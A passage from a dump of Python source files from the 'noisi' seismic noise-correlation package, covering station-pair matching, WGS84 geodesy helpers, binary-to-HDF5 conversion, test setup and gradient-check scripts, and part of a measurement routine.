\n\n\n###########################################################################\n### Older stuff, might be useful again but maybe not\n###########################################################################\n\n###########################################################################\n### Old: prepare input for specfem\n###########################################################################\[email protected](help='Prepare specfem input.')\[email protected]('project_path')\ndef specfem_input(project_path):\n prepare_specfem_input(os.path.join(project_path,'config.json'))\n\n\n###########################################################################\n### Old: Preprocess data (filtering is done anyway by measurement, if asked!)\n########################################################################### \[email protected](help='Preprocess observed correlations')\[email protected]('source_model')\[email protected]('--bandpass',help='Bandpass filter, format: freq1 freq2 corners.',\n default=None)\[email protected]('--decimator',help='Decimation factor. Default obspy antialias \\\nfilter will be run before decimating.',default=None)\[email protected]('--fs_new',help='New sampling rate. Ensure that filtering is \\\nperformed before!',default=None)\ndef preprocess_data(source_model,bandpass,decimator,fs_new):\n\n if bandpass is not None:\n bandpass = [float(bp) for bp in bandpass.split()]\n\n if fs_new is not None:\n fs_new = float(fs_new)\n\n if decimator is not None:\n decimator = int(decimator)\n\n \n run_preprocess_data(source_model,bandpass=bandpass,\n decimator=decimator,Fs_new=fs_new)\n"
},
{
"alpha_fraction": 0.5146095156669617,
"alphanum_fraction": 0.5438286066055298,
"avg_line_length": 26.80788230895996,
"blob_id": "c1bbddc38e6d03d895f6eed6904ecba3ecb8f851",
"content_id": "3ab64a0bf8b17f9c462d89315428275d971db67d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5647,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 203,
"path": "/noisi/util/corr_pairs.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from glob import glob\nimport os\nfrom pandas import read_csv\n\ndef define_correlationpairs(proj_dir,auto_corr=False,\n only_observed=True,channel='*'):\n \"\"\"\n Match correlation pairs.\n :param proj_dir: Path to project directory, where a stations.txt file has to be located\n \n :param auto_corr: Include or exclude autocorrelations\n :return corr_pairs: A list of correlation pairs in the format\n [['net1 sta1 lat1 lon1','net2 sta2 lat2 lon2'],[...]]\n \"\"\"\n \n try:\n stations = read_csv(os.path.join(proj_dir,'stationlist.csv'))\n nets = list(stations.net.values)\n stations = list(stations.sta.values)\n stations = [nets[i]+' '+stations[i] for i in range(len(stations))]\n \n except FileNotFoundError:\n stations = open(os.path.join(proj_dir,'stations.txt'),'r')\n \n stations = stations.read().split('\\n')\n \n stations.sort()\n i = 0\n corr_pairs = []\n \n while i < len(stations):\n sta_0 = stations[i].strip()\n if auto_corr:\n stas_other = stations[i:]\n else:\n stas_other = stations[i+1:]\n i += 1\n\n for sta in stas_other:\n\n if '' in [sta_0,sta]:\n continue\n corr_pairs.append([sta_0,sta])\n\n return corr_pairs\n\n\ndef rem_no_obs(stapairs,source_conf,directory,ignore_network=True):\n\n\n channel = source_conf['channel']\n channel = '??' + channel[-1]\n\n\n stapairs_new = []\n for i in range(len(stapairs)):\n # Check if an observation is actually available\n if stapairs[i] == '':\n break\n \n sta1 = '{}.{}.*.{}'.format(*(stapairs[i][0].split()[0:2]+[channel]))\n sta2 = '{}.{}.*.{}'.format(*(stapairs[i][1].split()[0:2]+[channel]))\n p_new = glob_obs_corr(sta1,sta2,directory,ignore_network)\n \n if p_new ==[]:\n continue\n stapairs_new.append(stapairs[i])\n return stapairs_new\n\n\ndef rem_fin_prs(stapairs,source_conf,step):\n\n \"\"\"\n Remove those station pairs from the list for which correlation / kernel has already \n been calculated.\n :param sta_pairs: List of all station pairs\n :param source_conf: source config dictionary\n :param step: step nr\n \"\"\"\n \n channel = source_conf['channel']\n\n mod_dir = os.path.join(source_conf['source_path'],'step_{}'.format(step),'corr')\n\n\n stapairs_new = []\n \n for sp in stapairs:\n id1 = sp[0].split()[0]+sp[0].split()[1]\n id2 = sp[1].split()[0]+sp[1].split()[1]\n\n if id1 < id2 :\n inf1 = sp[0].split()\n inf2 = sp[1].split()\n else:\n inf2 = sp[0].split()\n inf1 = sp[1].split()\n\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n \n corr_name = \"{}--{}.sac\".format(sta1,sta2) \n corr_name = os.path.join(mod_dir,corr_name)\n if not os.path.exists(corr_name):\n \n stapairs_new.append(sp)\n\n return stapairs_new\n\n# Find the filename of the synthetic correlation from the one of the observed correlation\ndef get_synthetics_filename(obs_filename,dir,synth_location='',\n fileformat='sac',synth_channel_basename='??',ignore_network=True):\n\n inf = obs_filename.split('--')\n\n if len(inf) == 1:\n # old station name format\n inf = obs_filename.split('.')\n net1 = inf[0]\n sta1 = inf[1]\n cha1 = inf[3]\n net2 = inf[4]\n sta2 = inf[5]\n cha2 = inf[7]\n elif len(inf) == 2:\n # new station name format\n inf1 = inf[0].split('.')\n inf2 = inf[1].split('.')\n net1 = inf1[0]\n sta1 = inf1[1]\n net2 = inf2[0]\n sta2 = inf2[1]\n cha1 = inf1[3]\n cha2 = inf2[3]\n\n\n cha1 = synth_channel_basename + cha1[-1]\n cha2 = synth_channel_basename + cha2[-1]\n\n\n sfilename = None\n\n if ignore_network:\n synth_filename1 = '*.{}.{}.{}--*.{}.{}.{}.{}'.format(sta1,synth_location,\n 
cha1,sta2,synth_location,cha2,fileformat)\n synth_filename2 = '*.{}.{}.{}--*.{}.{}.{}.{}'.format(sta2,synth_location,\n cha2,sta1,synth_location,cha1,fileformat)\n\n try: \n sfilename = glob(os.path.join(dir,synth_filename1))[0] \n except IndexError:\n try:\n sfilename = glob(os.path.join(dir,synth_filename2))[0]\n except IndexError:\n print('No synthetic file found for data:')\n print(obs_filename)\n\n else:\n synth_filename1 = '{}.{}.{}.{}--{}.{}.{}.{}.{}'.format(net1,sta1,synth_location,\n cha1,net2,sta2,synth_location,cha2,fileformat)\n\n try:\n sfilename = glob(os.path.join(dir,synth_filename1))[0] \n \n except IndexError:\n print('No synthetic file found for data:')\n print(obs_filename)\n \n\n return sfilename\n\n\ndef glob_obs_corr(sta1,sta2,directory,ignore_network):\n\n\n inf1 = sta1.split('.')\n inf2 = sta2.split('.')\n\n sta1 = inf1[1]\n sta2 = inf2[1]\n\n cha1 = '??' + inf1[3][-1]\n cha2 = '??' + inf2[3][-1]\n\n if ignore_network:\n net1 = '*'\n net2 = '*'\n else:\n net1 = inf1[0]\n net2 = inf2[0]\n\n\n obs_filename1 = os.path.join(directory,'{}.{}.*.{}*{}.{}.*.{}.*'.format(net1,sta1,cha1,net2,sta2,cha2))\n obs_filename2 = os.path.join(directory,'{}.{}.*.{}*{}.{}.*.{}.*'.format(net2,sta2,cha2,net1,sta1,cha1))\n \n if ignore_network:\n obs_files = glob(obs_filename1)\n obs_files.extend(glob(obs_filename2))\n else:\n obs_files = glob(obs_filename1)\n\n\n return obs_files\n\n\n"
},
{
"alpha_fraction": 0.5158573985099792,
"alphanum_fraction": 0.5481096506118774,
"avg_line_length": 31.23121452331543,
"blob_id": "bfaef2ea907818f4f49557b0f460826d30b20520",
"content_id": "4d6cbb30e1a8388dededfad3ff9b8501945054e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5581,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 173,
"path": "/noisi/util/geo.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom math import pi, sin, cos, sqrt\nfrom obspy.geodetics import gps2dist_azimuth\n\n\ndef wgs84():\n\n # semi-major axis, in m\n a = 6378137.0\n\n # semi-minor axis, in m\n b = 6356752.314245\n\n # inverse flattening f\n f = a/(a-b)\n\n # squared eccentricity e\n e_2 = (a**2-b**2)/a**2\n \n return(a,b,e_2,f)\n\n # geographic to geocentric\ndef geograph_to_geocent(theta):\n # https://en.wikipedia.org/wiki/Latitude#Geocentric_latitude\n e2 = wgs84()[2]\n theta = np.rad2deg(np.arctan((1 - e2) * np.tan(np.deg2rad(theta))))\n return theta\n\ndef len_deg_lon(lat):\n \n (a,b,e_2,f) = wgs84()\n # This is the length of one degree of longitude \n # approx. after WGS84, at latitude lat\n # in m\n lat = pi/180*lat\n dlon = (pi*a*cos(lat))/180*sqrt((1-e_2*sin(lat)**2))\n return round(dlon,5)\n\ndef len_deg_lat(lat):\n # This is the length of one degree of latitude \n # approx. after WGS84, between lat-0.5deg and lat+0.5 deg\n # in m\n lat = pi/180*lat\n dlat = 111132.954 - 559.822 * cos(2*lat) + 1.175*cos(4*lat)\n return round(dlat,5)\n\ndef get_spherical_surface_elements(lon,lat):\n\n # radius...assuming spherical Earth here\n r = 6.378100e6\n # surfel\n surfel = np.zeros(lon.shape)\n colat = 90. - lat\n\n # find neighbours\n for i in range(len(lon)):\n\n # finding the relevant neighbours is very specific to how the grid is\n # set up here (in rings of constant colatitude)!\n\n # get the nearest longitude along the current colatitude \n current_colat = colat[i]\n if current_colat in [0.,180.]:\n # surface area will be 0 at poles.\n continue\n\n colat_idx = np.where(colat==current_colat)\n lon_idx_1 = np.argsort(np.abs(lon[colat_idx]-lon[i]))[1]\n lon_idx_2 = np.argsort(np.abs(lon[colat_idx]-lon[i]))[2]\n closest_lon_1 = lon[colat_idx][lon_idx_1]\n closest_lon_2 = lon[colat_idx][lon_idx_2]\n \n if closest_lon_1 > lon[i] and closest_lon_2 > lon[i]:\n d_lon = np.abs(min(closest_lon_2,closest_lon_1)-lon[i])\n\n elif closest_lon_1 < lon[i] and closest_lon_2 < lon[i]:\n d_lon = np.abs(max(closest_lon_2,closest_lon_1)-lon[i])\n \n else:\n if closest_lon_1 != lon[i] and closest_lon_2 != lon[i]:\n d_lon = np.abs(closest_lon_2 - closest_lon_1) * 0.5\n else:\n d_lon = np.max(np.abs(closest_lon_2-lon[i]),\n np.abs(closest_lon_1-lon[i]))\n\n # wuah...I am fed up so let's do this in a slightly rubbish manner\n colats = np.array(list(set(colat.copy())))\n colat_idx_1 = np.argsort(np.abs(colats-current_colat))[1]\n closest_colat_1 = colats[colat_idx_1]\n colat_idx_2 = np.argsort(np.abs(colats-current_colat))[2]\n closest_colat_2 = colats[colat_idx_2]\n \n\n if (closest_colat_2 > current_colat and \n closest_colat_1 > current_colat):\n d_colat = np.abs(min(closest_colat_1,\n closest_colat_2)-current_colat)\n \n elif (closest_colat_2 < current_colat and \n closest_colat_1 < current_colat):\n d_colat = np.abs(max(closest_colat_1,\n closest_colat_2)-current_colat)\n \n else:\n if (closest_colat_2 != current_colat \n and closest_colat_1 != current_colat):\n d_colat = 0.5 * np.abs(closest_colat_2-closest_colat_1)\n else:\n d_colat = np.max(np.abs(closest_colat_2-current_colat),\n np.abs(closest_colat_1-current_colat))\n\n surfel[i] = np.deg2rad(d_lon) *\\\n np.deg2rad(d_colat) * sin(np.deg2rad(colat[i])) * r**2\n\n\n return(surfel)\n\n\n\n\n\n#ToDo: Tests\ndef points_on_sphere(dx,xmin=-180.,xmax=180.,ymin=-90.,ymax=90.,c_centr=None,\\\nradius=None):\n \"\"\"\n Calculate a more or less equally spaced grid on spherical Earth's surface.\n :param dx: spacing in latitudinal and longitudinal 
direction in meter\n :type c_centr: Tuple\n :param c_centr: Specify a central location\n :type radius: float\n :param radius: Radius around central location in m; no sources beyond this will be included\n :returns: np.array(latitude, longitude) of grid points, where -180<=lon<180 and -90 <= lat < 90\n \"\"\"\n \n if xmax <= xmin or ymax <= ymin:\n msg = 'Lower bounds must be lower than upper bounds.'\n raise ValueError(msg)\n\n \n gridx = []\n gridy = []\n \n lat = ymin\n \n while lat <= ymax:\n d_lat = dx / len_deg_lat(lat)\n lon = xmin\n while lon <= xmax:\n \n if c_centr and radius:\n if gps2dist_azimuth(lat,lon,c_centr[0],c_centr[1])[0] > radius:\n if abs(lat) != 90.:\n d_lon = dx / len_deg_lon(lat)\n lon += d_lon\n continue\n else:\n break\n \n gridx.append(lon)\n gridy.append(lat)\n \n if abs(lat) == 90:\n # length of a degree longitude will be 0.\n break\n else:\n d_lon = dx / len_deg_lon(lat)\n lon += d_lon\n lat += d_lat # do not start at pole or zero division will raise...\n \n \n # return values sorted by longitude, because basemap complains otherwise.\n grid = list(zip(*sorted(zip(gridx, gridy), key=lambda it: it[0])))\n return grid\n \n"
},
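A quick sanity check for the degree-length formulas in geo.py above (not part of the repository; values are illustrative): convert a metric spacing dx into latitude/longitude steps the way points_on_sphere does.

# Minimal sketch, assuming the WGS84 constants from wgs84() above.
from math import pi, sin, cos, sqrt

a, b = 6378137.0, 6356752.314245      # WGS84 semi-major/semi-minor axes, m
e_2 = (a**2 - b**2) / a**2            # squared eccentricity

def deg_steps(dx, lat):
    # return the (d_lat, d_lon) steps in degrees for a spacing of dx meters
    phi = pi / 180. * lat
    len_lat = 111132.954 - 559.822 * cos(2 * phi) + 1.175 * cos(4 * phi)
    len_lon = (pi * a * cos(phi)) / (180. * sqrt(1 - e_2 * sin(phi)**2))
    return dx / len_lat, dx / len_lon

print(deg_steps(100000., 45.))        # roughly (0.90, 1.27) degrees at 45 N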
{
"alpha_fraction": 0.6215510964393616,
"alphanum_fraction": 0.6372110247612,
"avg_line_length": 31.69512176513672,
"blob_id": "445536ef7afeb8dcd4d08d2255fcfb93f17f1c96",
"content_id": "ff87345e49c1722601c643a37403aa0fffb8863b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2682,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 82,
"path": "/noisi/util/bin_to_h5.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "#ToDo Docs\n#ToDo build calling into main\n#ToDo check whether these are all the metadata we sensibly need.\n\n\nimport h5py\nimport os\nimport sys\nimport numpy as np\n\n#- User input: -----------------------------------------\n#-------------------------------------------------------\nnbytes_stationname = 512\nsize_of_float = 4\ndata_quantity = 'VEL' #'DIS','VEL','ACC'\n#-------------------------------------------------------\n#-------------------------------------------------------\n\n\n\nf_in = sys.argv[1]\nnbytes_total = os.path.getsize(f_in)\nf_sources = sys.argv[2]\nf_out_name = os.path.splitext(f_in)[0]+'.h5'\n\nf_in = open(f_in,'rb')\nf_sources = np.load(f_sources)\nf_out = h5py.File(f_out_name, \"w\")\n\n# Get metadata\nf_in.seek(nbytes_stationname)\nntimesteps = np.fromfile(f_in,dtype='f'+str(size_of_float),count=1)[0]\nntimesteps = int(ntimesteps)\nFs = round(np.fromfile(f_in,dtype='f'+str(size_of_float),count=1)[0],6)\n# Record lengths: station name plus two header values plus length of data array\nnbytes_trace = nbytes_stationname + (2 + ntimesteps) * size_of_float \n# Number of records actually contained\nntraces = int(nbytes_total / nbytes_trace)\nprint('This file contains %g Traces.' %ntraces)\n# Reference station: \n# ToDo: May differentiate location?\nrefstation = os.path.basename(sys.argv[1])\nrefstation = os.path.splitext(refstation)[0]\n\n# DATASET NR 1: STATS\nstats = f_out.create_dataset('stats',data=(0,))\nstats.attrs['reference_station'] = refstation\nstats.attrs['data_quantity'] = data_quantity\nstats.attrs['ntraces'] = ntraces\nstats.attrs['Fs'] = Fs\nstats.attrs['nt'] = int(ntimesteps)\n\n# DATASET NR 2: Source grid\nsources = f_out.create_dataset('sourcegrid',data=f_sources[0:2])\n\n# DATASET Nr 3: Seismograms itself\ntraces = f_out.create_dataset('data',(ntraces,ntimesteps),dtype=np.float32)\n\n\n# jump to the beginning of the trace in the binary file\nf_in.seek(0)\ni = 0\nprint('Starting to read seismograms from: %s' %sys.argv[1])\nwhile i < ntraces:\n if i%10000 == 0:\n print('Converted %g of %g traces' %(i,ntraces))\n # read station name, copy to output file\n staname = f_in.read(nbytes_stationname)\n staname = str(staname.decode('utf-8')).strip()\n # These are only read to jump over the entries\n nt_temp = int(np.fromfile(f_in,dtype='f'+str(size_of_float),count=1)[0])\n Fs_temp = np.fromfile(f_in,dtype='f'+str(size_of_float),count=1)[0]\n \n # Get the index of that station -- > This links it with the right source coordinate pair.\n staindex = int(staname.split('.')[1])\n values = np.fromfile(f_in,dtype='f'+str(size_of_float),count=ntimesteps)\n \n # Save in traces array\n traces[staindex,:] += values\n \n i += 1\nf_out.close()\n\n"
},
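For reference, a sketch (assumed, not from the repository) of the record layout that bin_to_h5.py above expects: each record is a station name padded to nbytes_stationname bytes, two float32 header values (nt, Fs), then nt float32 samples. The file name is hypothetical.

import numpy as np

nt, fs = 100, 1.0
with open('example.bin', 'wb') as f:                  # hypothetical file
    f.write('NET.0..CHA'.ljust(512).encode('utf-8'))  # station name, 512 bytes
    np.array([nt, fs], dtype='f4').tofile(f)          # two float32 header values
    np.zeros(nt, dtype='f4').tofile(f)                # the samples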
{
"alpha_fraction": 0.6995024681091309,
"alphanum_fraction": 0.7074626684188843,
"avg_line_length": 34.82143020629883,
"blob_id": "8fac6172131dd29a2a61056e86190f8c0f648a55",
"content_id": "e485251c2534072bedb19b628666b97e4404bb1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1005,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 28,
"path": "/noisi/test/test_aa_noisi.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nos.system(\"noisi\")\nif not os.path.exists(\"test/testdata/testsrc\"):\n sys.exit(\"\\n\\n\\nGo to noisi/noisi directory to run tests.\\n\\n\\n\")\n\ndef test_aa_noisi():\n\n os.system('cp test/testdata/config_archived.json test/testdata/config.json')\n os.system('cp test/testdata/testsrc/source_config_archived.json \\\ntest/testdata/testsrc/source_config.json')\n os.system('cp test/testdata/testsrc/measr_config_archived.json \\\ntest/testdata/testsrc/measr_config.json')\n \n os.system('rm -rf test/testdata/testsrc/wavefield_processed/')\n \n os.system(\"rm -rf test/testdata/testsrc/step_0/corr\")\n #os.mkdir(\"test/testdata/testsrc/step_0/corr\")\n\n os.system(\"rm -rf test/testdata/testsrc/step_0/adjt\")\n #os.mkdir(\"test/testdata/testsrc/step_0/adjt\")\n\n os.system(\"rm -rf test/testdata/testsrc/step_0/kern\")\n #os.mkdir(\"test/testdata/testsrc/step_0/kern\")\n\n os.system(\"rm -rf test/testdata/testsrc/step_0/grad\")\n #os.mkdir(\"test/testdata/testsrc/step_0/grad\")\n\n\n"
},
{
"alpha_fraction": 0.6441042423248291,
"alphanum_fraction": 0.6591458320617676,
"avg_line_length": 29.5,
"blob_id": "a84c24db841b566fc034bee8e924c3917f65c0c3",
"content_id": "98c19f44450794dc0f0861381335be5f1134a923",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3723,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 122,
"path": "/noisi/test/check_gradient.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom obspy import Trace, read\nfrom noisi.scripts import measurements as rm\nfrom noisi.scripts import adjnt_functs as af\nfrom noisi import WaveField, NoiseSource\nimport os\nimport h5py\n\n# necessary data must be located in the test/testdata directory.\n\n# *********************************************\n# input:\n# *********************************************\nsteps = np.arange(-8, 0.5, 0.3)\nmtype = 'ln_energy_ratio' # only ln_energy_ratio can be used.\ng_speed = 3300.\nwindow_params = {}\nwindow_params['bandpass'] \t\t= None\nwindow_params['hw'] = 20\nwindow_params['sep_noise'] = 0.\nwindow_params['win_overlap'] = False\nwindow_params['wtype'] = 'hann'\nwindow_params['causal_side'] = True\nwindow_params['plot'] = False\n# *********************************************\n# *********************************************\n\n# only for testing the test:\n# def l2_simple(tr_1,tr_2):\n# \tmf = np.sum(0.5 * (tr_1.data - tr_2.data) **2)\n# \tadstf = (tr_1.data - tr_2.data)\n# \treturn mf,adstf\n\n# preparations:\nos.mkdir('test/testdata/testsrc/step_0/corr')\nos.system('cp -R test/testdata/testsrc/wavefield_processed_archived \\\ntest/testdata/testsrc/wavefield_processed')\nos.system('cp test/testdata/config_archived.json \\\ntest/testdata/config.json')\nos.system('cp test/testdata/testsrc/measr_config_archived.json \\\n\ttest/testdata/testsrc/measr_config.json')\nos.system('cp test/testdata/testsrc/source_config_archived.json \\\ntest/testdata/testsrc/source_config.json')\n\n\nm_a_options = {'g_speed':g_speed,'window_params':window_params}\nm_func = rm.get_measure_func(mtype) \n\nwf = WaveField('test/testdata/wavefield_vel/NET.STA1..CHA.h5')\nnlocs = wf.stats['ntraces']\n\n\n# create perturbation\nd_q = 2 * (np.random.rand(nlocs,) - 0.5)\n\n\n\n# evaluate original misfit and load original gradient\nm_a_options = {'g_speed':g_speed,'window_params':window_params}\nm_func = rm.get_measure_func(mtype)\n\n# open the files....\nobs = read('test/testdata/testsrc/observed_correlations/*.sac')[0]\nsyn = read('test/testdata/testsrc/step_0/corr_archived/*.sac')[0]\nsyn.stats.sac = {}\nsyn.stats.sac['dist'] = obs.stats.sac.dist\nmsr_o = m_func(obs,**m_a_options)\nmsr_s = m_func(syn,**m_a_options)\n\n# unperturbed misfit\nj = 0.5*(msr_s-msr_o)**2\n# unperturbed gradient\ngrad = np.load('test/testdata/testsrc/step_0/grad_archived/grad_all.npy')\n\n# left hand side of test 3: gradient * dq = change of misfit wrt q\ngrad_dq = np.dot(grad,d_q)\n\ndcheck = []\n# loop:\nfor step in steps:\n# add perturbation to archived model --> current model\n\tos.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5 test/testdata/testsrc/step_0/starting_model.h5')\n\n\tn = h5py.File('test/testdata/testsrc/step_0/starting_model.h5')\n\t\n\tn['distr_basis'][:] += 10.**step * d_q\n\t\n\tn.flush()\n\tn.close()\n# run correlation\n\n\tos.system('noisi correlation test/testdata/testsrc 0')\n\n# evaluate misfit and add to list.\n\tsyn = read('test/testdata/testsrc/step_0/corr/*.sac')[0]\n\tsyn.stats.sac = {}\n\tsyn.stats.sac['dist'] = obs.stats.sac.dist\n\tmsr_sh = m_func(syn,**m_a_options)\n\n\tjh = 0.5 * (msr_sh - msr_o)**2\n\tdjdqh = (jh - j) / (10.**step) \n\t\n\tdcheck.append(abs(grad_dq - djdqh) / abs(grad_dq))\n\n# remove the current synthetics\n\tos.system('rm test/testdata/testsrc/step_0/corr/*')\n\t\n# plot results\n\n# plot\nplt.semilogy(steps,dcheck)\nplt.title(\"Check for gradient\")\nplt.show()\n\n# clean up...\nos.system('rmdir 
test/testdata/testsrc/step_0/corr')\nos.system('rm test/testdata/config.json')\nos.system('rm test/testdata/testsrc/source_config.json')\nos.system('rm test/testdata/testsrc/measr_config.json')\n\nos.system('rm -rf test/testdata/testsrc/wavefield_processed')\n\n\n"
},
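check_gradient.py implements a standard finite-difference gradient test. A toy version of the same idea on a quadratic misfit, where the analytic gradient is known (illustrative only, not repo code): the relative error between g.dq and the finite-difference quotient should shrink as the step goes to zero.

import numpy as np

q = np.random.rand(5)                 # model
dq = np.random.rand(5) - 0.5          # random perturbation direction
J = lambda x: 0.5 * np.sum(x**2)      # misfit functional
g = q.copy()                          # analytic gradient of J at q

for step in np.arange(-8, 0.5, 0.3):  # same step range as the script above
    h = 10.**step
    djdqh = (J(q + h * dq) - J(q)) / h
    print(step, abs(np.dot(g, dq) - djdqh) / abs(np.dot(g, dq)))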
{
"alpha_fraction": 0.49980494379997253,
"alphanum_fraction": 0.5078993439674377,
"avg_line_length": 33.996585845947266,
"blob_id": "38509d216c7585317ffa3390bf4809a2e1ac2066",
"content_id": "62531425569d1f1c10b0535637d7338780c3a59c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10254,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 293,
"path": "/noisi/scripts/run_measurement.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport pandas as pd\nfrom math import log, pi\nimport click\nimport copy\nimport json\nfrom glob import glob\nfrom obspy import read, Trace\nfrom obspy.geodetics import gps2dist_azimuth\nimport matplotlib.pyplot as plt\n#ToDo plot if requested.\nfrom noisi.scripts import measurements as rm\n#from noisi.scripts import adjnt_functs as af\nfrom noisi.util.windows import my_centered, snratio\nfrom noisi.util.corr_pairs import get_synthetics_filename\n# Get and return measurement as a table or something.\nfrom warnings import warn\n\ndef get_station_info(stats):\n\n sta1 = '{}.{}.{}.{}'.format(stats.network,stats.station,stats.location,\n stats.channel)\n\n try:\n sta2 = '{}.{}.{}.{}'.format(stats.sac.kuser0.strip(),stats.sac.kevnm.strip(),\n stats.sac.kuser1.strip(),stats.sac.kuser2.strip())\n except AttributeError:\n sta2 = '{}.{}.{}.{}'.format(stats.sac.kuser0.strip(),stats.sac.kevnm.strip(),\n '',stats.sac.kuser2.strip())\n lat1 = stats.sac.stla\n lon1 = stats.sac.stlo\n lat2 = stats.sac.evla\n lon2 = stats.sac.evlo\n dist = stats.sac.dist\n az,baz = gps2dist_azimuth(lat1,lon1,lat2,lon2)[1:]\n\n\n return([sta1,sta2,lat1,lon1,lat2,lon2,dist,az,baz])\n\n\ndef measurement(source_config,mtype,step,ignore_network,\n bandpass,step_test,taper_perc,**options):\n \n \"\"\"\n Get measurements on noise correlation data and synthetics. \n options: g_speed,window_params (only needed if \n mtype is ln_energy_ratio or enery_diff)\n \"\"\"\n step_n = 'step_{}'.format(int(step))\n\n\n step_dir = os.path.join(source_config['source_path'],\n step_n)\n\n if step_test:\n corr_dir = os.path.join(step_dir,'obs_slt')\n else:\n corr_dir = os.path.join(source_config['source_path'],\n 'observed_correlations')\n\n\n files = [f for f in os.listdir(corr_dir) ]\n\n files = [os.path.join(corr_dir,f) for f in files]\n\n synth_dir = os.path.join(step_dir,'corr')\n\n\n columns = ['sta1','sta2','lat1','lon1','lat2','lon2','dist','az','baz',\n 'syn','syn_a','obs','obs_a','l2_norm','snr','snr_a','nstack']\n measurements = pd.DataFrame(columns=columns)\n\n _options_ac = copy.deepcopy(options)\n _options_ac['window_params']['causal_side'] = not(options['window_params']['causal_side'])\n \n # ToDo\n if mtype == 'inst_phase':\n _opt_inst = copy.deepcopy(options)\n\n\n if files == []:\n msg = 'No input found!'\n raise ValueError(msg)\n\n i = 0\n with click.progressbar(files,label='Taking measurements...') as bar:\n\n for f in bar:\n\n\n\n #======================================================\n # Reading\n #======================================================\n\n try:\n tr_o = read(f)[0]\n except:\n print('\\nCould not read data: '+os.path.basename(f))\n i+=1\n continue\n try:\n synth_filename = get_synthetics_filename(os.path.basename(f),\n synth_dir,ignore_network=ignore_network)\n\n except:\n print('\\nCould not obtain synthetics filename: ' + \\\n os.path.basename(f))\n i+=1\n continue\n\n if synth_filename is None:\n continue\n #sfile = glob(os.path.join(synth_dir,synth_filename))[0]\n #print(synth_filename)\n try:\n tr_s = read(synth_filename)[0]\n except:\n print('\\nCould not read synthetics: ' + \\\n synth_filename)\n i+=1\n continue\n\n #======================================================\n # Assigning stats to synthetics, cutting them to right length\n #======================================================\n\n tr_s.stats.sac = tr_o.stats.sac.copy() #ToDo: Give the stats to this thing before!\n tr_s.data = my_centered(tr_s.data,tr_o.stats.npts)\n # Get all the necessary 
information\n info = get_station_info(tr_o.stats)\n\n #======================================================\n # Filtering\n #======================================================\n print(bandpass)\n if bandpass != None:\n tr_o.taper(taper_perc)\n tr_o.filter('bandpass',freqmin=bandpass[0],\n freqmax=bandpass[1],corners=bandpass[2],\n zerophase=True)\n tr_s.taper(taper_perc)\n tr_s.filter('bandpass',freqmin=bandpass[0],\n freqmax=bandpass[1],corners=bandpass[2],\n zerophase=True)\n\n\n\n #======================================================\n # Weight observed stack by nstack\n #======================================================\n\n tr_o.data /= tr_o.stats.sac.user0\n\n\n\n #======================================================\n # Measurement\n #======================================================\n\n # Take the measurement\n func = rm.get_measure_func(mtype)\n\n # ToDo Change this!!!\n if mtype == 'inst_phase':\n _opt_inst['corr_syn'] = tr_s\n try:\n msr = func(tr_o,**_opt_inst)\n except:\n print(\"** Could not take measurement\")\n print(f)\n continue\n\n else:\n try:\n\n msr_o = func(tr_o,**options)\n msr_s = func(tr_s,**options)\n except:\n print(\"** Could not take measurement\")\n print(f)\n continue\n\n # timeseries-like measurements:\n if mtype in ['square_envelope',\n 'waveform','windowed_waveform']:\n # l2_so = np.trapz(0.5*(msr_s-msr_o)**2) * tr_o.stats.delta\n l2_so = 0.5 * np.sum(np.power((msr_s-msr_o),2))#0.5*np.dot((msr_s-msr_o),(msr_s-msr_o))\n snr = snratio(tr_o,**options)\n snr_a = snratio(tr_o,**_options_ac)\n info.extend([np.nan,np.nan,np.nan,np.nan,\n l2_so,snr,snr_a,tr_o.stats.sac.user0])\n # single value measurements:\n else:\n\n if mtype == 'energy_diff':\n l2_so = 0.5*(msr_s-msr_o)**2\n msr = msr_o[0]\n msr_a = msr_o[1]\n snr = snratio(tr_o,**options)\n snr_a = snratio(tr_o,**_options_ac)\n l2 = l2_so.sum()\n info.extend([msr_s[0],msr_s[1],msr,msr_a,\n l2,snr,snr_a,tr_o.stats.sac.user0])\n elif mtype == 'ln_energy_ratio':\n l2_so = 0.5*(msr_s-msr_o)**2\n msr = msr_o\n snr = snratio(tr_o,**options)\n snr_a = snratio(tr_o,**_options_ac)\n info.extend([msr_s,np.nan,msr,np.nan,\n l2_so,snr,snr_a,tr_o.stats.sac.user0])\n\n elif mtype == 'inst_phase':\n snr = snratio(tr_o,**options)\n snr_a = snratio(tr_o,**_options_ac)\n info.extend([np.nan,np.nan,np.nan,np.nan,\n msr,snr,snr_a,tr_o.stats.sac.user0])\n\n measurements.loc[i] = info\n\n # step index\n i+=1\n\n return measurements\n\ndef run_measurement(source_configfile,measr_configfile,\n step,ignore_network,step_test):\n\n\n # get parameters\n source_config=json.load(open(source_configfile))\n measr_config=json.load(open(measr_configfile))\n mtype = measr_config['mtype']\n bandpass = measr_config['bandpass']\n step_n = 'step_{}'.format(int(step))\n step_dir = os.path.join(source_config['source_path'],\n step_n)\n taper_perc = measr_config['taper_perc']\n\n window_params = {}\n 